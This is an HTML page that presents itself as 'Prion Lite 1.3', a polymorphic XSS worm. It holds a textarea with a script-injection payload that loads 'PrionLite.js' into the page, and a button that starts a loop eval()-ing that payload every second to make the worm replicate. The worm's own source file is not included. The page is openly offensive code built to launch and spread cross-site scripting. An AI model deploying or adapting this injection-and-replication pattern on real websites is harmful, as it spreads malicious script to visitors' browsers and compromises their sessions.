﻿<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
    <title>Prion Lite 1.3 - A Polymorphic XSS Worm by John Leitch</title>
    <script type="text/javascript">
        var replicating = false;

        setInterval("if(replicating)evalWorm();", 1000);

        function evalWorm() {
            var code = document.getElementById('xssWormLite13').value.replace('&lt;', '<');
            
            eval(code);
        }

        function toggleReplication() {
            replicating = !replicating;
            document.getElementById('replicateButtonLite13').value =
                (replicating ? 'Stop' : 'Start') + ' Replicating';
        }        
    </script>
</head>
<body>
    <textarea id="xssWormLite13" style="width:100%;height:600px">var s=document.createElement("script");s["src"]="PrionLite.js";document.body.appendChild(s);</textarea>
    <input id="replicateButtonLite13" type="button" onclick="toggleReplication()" value="Start Replicating" />    
</body>
</html>
